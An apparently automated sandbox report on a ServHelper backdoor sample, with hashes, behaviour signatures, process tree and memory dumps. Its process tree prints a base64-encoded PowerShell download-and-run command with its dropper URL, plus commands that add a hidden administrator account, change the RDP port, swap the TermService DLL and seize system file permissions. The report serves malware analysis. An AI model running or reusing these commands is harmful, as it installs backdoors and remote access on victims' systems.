Analysis

  • max time kernel
    125s
  • max time network
    65s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    22-05-2021 21:05

General

  • Target

    3697ca9544a5562a762834461b3c0c09.exe

  • Size

    6.0MB

  • MD5

    3697ca9544a5562a762834461b3c0c09

  • SHA1

    eb9ec8c1ddad50259ce14d53d5953801b8066087

  • SHA256

    6966ad7c975ddb2bddcd4b4ed59fbf594ea0efbf2ecf5379cb288a861ad135c6

  • SHA512

    5945ec46f243f7484448430237cb8a6b38fe23db4d46680a5bceed7802eae4d570f4ed1ed1c35d01d5f1c41c9c53f7f5986f37bae00cbd53eae6e0b164dc7fd9

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Possible privilege escalation attempt 8 IoCs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 21 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3697ca9544a5562a762834461b3c0c09.exe
    "C:\Users\Admin\AppData\Local\Temp\3697ca9544a5562a762834461b3c0c09.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1484
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1212
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1584
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2044
      • C:\Windows\system32\takeown.exe
        "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1208
      • C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1136
      • C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:668
      • C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:520
      • C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:616
      • C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:844
      • C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1396
      • C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1604
      • C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        3⤵
          PID:1212
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
          3⤵
          • Modifies registry key
          PID:632
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
          3⤵
            PID:324
          • C:\Windows\system32\net.exe
            "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1512
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              4⤵
                PID:1032
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1968
              • C:\Windows\system32\cmd.exe
                cmd /c net start rdpdr
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:992
                • C:\Windows\system32\net.exe
                  net start rdpdr
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:360
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 start rdpdr
                    6⤵
                      PID:2044
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                3⤵
                  PID:1820
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                      PID:1200
                      • C:\Windows\system32\net.exe
                        net start TermService
                        5⤵
                          PID:1180
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 start TermService
                            6⤵
                              PID:292
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                        3⤵
                          PID:300
                        • C:\Windows\system32\cmd.exe
                          "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                          3⤵
                            PID:1208
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe user wgautilacc Ghar4f5 /del
                        1⤵
                          PID:844
                          • C:\Windows\system32\net.exe
                            net.exe user wgautilacc Ghar4f5 /del
                            2⤵
                              PID:2020
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
                                3⤵
                                  PID:748
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user wgautilacc t1eFTEzO /add
                              1⤵
                                PID:1864
                                • C:\Windows\system32\net.exe
                                  net.exe user wgautilacc t1eFTEzO /add
                                  2⤵
                                    PID:1708
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 user wgautilacc t1eFTEzO /add
                                      3⤵
                                        PID:568
                                  • C:\Windows\System32\cmd.exe
                                    cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                    1⤵
                                      PID:1288
                                      • C:\Windows\system32\net.exe
                                        net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                        2⤵
                                          PID:1692
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
                                            3⤵
                                              PID:1636
                                        • C:\Windows\System32\cmd.exe
                                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
                                          1⤵
                                            PID:876
                                            • C:\Windows\system32\net.exe
                                              net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
                                              2⤵
                                                PID:788
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
                                                  3⤵
                                                    PID:556
                                              • C:\Windows\System32\cmd.exe
                                                cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                                1⤵
                                                  PID:1236
                                                  • C:\Windows\system32\net.exe
                                                    net.exe LOCALGROUP "Administrators" wgautilacc /ADD
                                                    2⤵
                                                      PID:1612
                                                      • C:\Windows\system32\net1.exe
                                                        C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
                                                        3⤵
                                                          PID:892
                                                    • C:\Windows\System32\cmd.exe
                                                      cmd /C net.exe user wgautilacc t1eFTEzO
                                                      1⤵
                                                        PID:632
                                                        • C:\Windows\system32\net.exe
                                                          net.exe user wgautilacc t1eFTEzO
                                                          2⤵
                                                            PID:972
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 user wgautilacc t1eFTEzO
                                                              3⤵
                                                                PID:524
                                                          • C:\Windows\System32\cmd.exe
                                                            cmd.exe /C wmic path win32_VideoController get name
                                                            1⤵
                                                              PID:1288
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic path win32_VideoController get name
                                                                2⤵
                                                                • Modifies data under HKEY_USERS
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1796
                                                            • C:\Windows\System32\cmd.exe
                                                              cmd.exe /C wmic CPU get NAME
                                                              1⤵
                                                                PID:1856
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic CPU get NAME
                                                                  2⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1512
                                                              • C:\Windows\System32\cmd.exe
                                                                cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                1⤵
                                                                  PID:1840
                                                                  • C:\Windows\system32\cmd.exe
                                                                    cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                    2⤵
                                                                      PID:972
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                                        3⤵
                                                                        • Blocklisted process makes network request
                                                                        • Drops file in Windows directory
                                                                        • Modifies data under HKEY_USERS
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:524

                                                                  Network

                                                                  MITRE ATT&CK Enterprise v6

                                                                  Replay Monitor

                                                                  Loading Replay Monitor...

                                                                  Downloads

                                                                  • memory/524-197-0x00000000195B4000-0x00000000195B6000-memory.dmp

                                                                    Filesize

                                                                    8KB

                                                                  • memory/524-196-0x00000000195B0000-0x00000000195B2000-memory.dmp

                                                                    Filesize

                                                                    8KB

                                                                  • memory/524-198-0x00000000195BA000-0x00000000195D9000-memory.dmp

                                                                    Filesize

                                                                    124KB

                                                                  • memory/1212-90-0x000000001AC30000-0x000000001AC31000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1212-112-0x000000001B770000-0x000000001B771000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1212-85-0x000000001ACD0000-0x000000001ACD2000-memory.dmp

                                                                    Filesize

                                                                    8KB

                                                                  • memory/1212-86-0x000000001ACD4000-0x000000001ACD6000-memory.dmp

                                                                    Filesize

                                                                    8KB

                                                                  • memory/1212-88-0x0000000002680000-0x0000000002681000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1212-92-0x0000000002940000-0x0000000002941000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1212-93-0x0000000002200000-0x0000000002201000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1212-98-0x000000001B730000-0x000000001B731000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1212-111-0x000000001B640000-0x000000001B641000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1484-72-0x0000000002290000-0x0000000002291000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1484-68-0x000000001AC00000-0x000000001AC01000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1484-74-0x000000001B4B0000-0x000000001B4B1000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1484-70-0x000000001AB80000-0x000000001AB82000-memory.dmp

                                                                    Filesize

                                                                    8KB

                                                                  • memory/1484-76-0x000000001AB8A000-0x000000001ABA9000-memory.dmp

                                                                    Filesize

                                                                    124KB

                                                                  • memory/1484-77-0x000000001B6F0000-0x000000001B6F1000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1484-78-0x000000001C180000-0x000000001C181000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1484-79-0x000000001B580000-0x000000001B581000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1484-71-0x000000001AB84000-0x000000001AB86000-memory.dmp

                                                                    Filesize

                                                                    8KB

                                                                  • memory/1484-66-0x000007FEFB881000-0x000007FEFB883000-memory.dmp

                                                                    Filesize

                                                                    8KB

                                                                  • memory/1484-67-0x0000000002330000-0x0000000002331000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1484-69-0x000000001AA50000-0x000000001AA51000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1484-148-0x000000001C750000-0x000000001C751000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1584-125-0x000000001AAB0000-0x000000001AAB1000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1584-126-0x0000000001E40000-0x0000000001E41000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1584-123-0x000000001B600000-0x000000001B601000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1584-121-0x000000001A9D0000-0x000000001A9D1000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1584-119-0x000000001AA34000-0x000000001AA36000-memory.dmp

                                                                    Filesize

                                                                    8KB

                                                                  • memory/1584-118-0x000000001AA30000-0x000000001AA32000-memory.dmp

                                                                    Filesize

                                                                    8KB

                                                                  • memory/1640-59-0x0000000041770000-0x0000000041B91000-memory.dmp

                                                                    Filesize

                                                                    4.1MB

                                                                  • memory/1640-64-0x0000000028617000-0x0000000028618000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/1640-62-0x0000000028614000-0x0000000028616000-memory.dmp

                                                                    Filesize

                                                                    8KB

                                                                  • memory/1640-61-0x0000000028612000-0x0000000028614000-memory.dmp

                                                                    Filesize

                                                                    8KB

                                                                  • memory/1640-63-0x0000000028616000-0x0000000028617000-memory.dmp

                                                                    Filesize

                                                                    4KB

                                                                  • memory/2044-140-0x000000001AC30000-0x000000001AC32000-memory.dmp

                                                                    Filesize

                                                                    8KB

                                                                  • memory/2044-141-0x000000001AC34000-0x000000001AC36000-memory.dmp

                                                                    Filesize

                                                                    8KB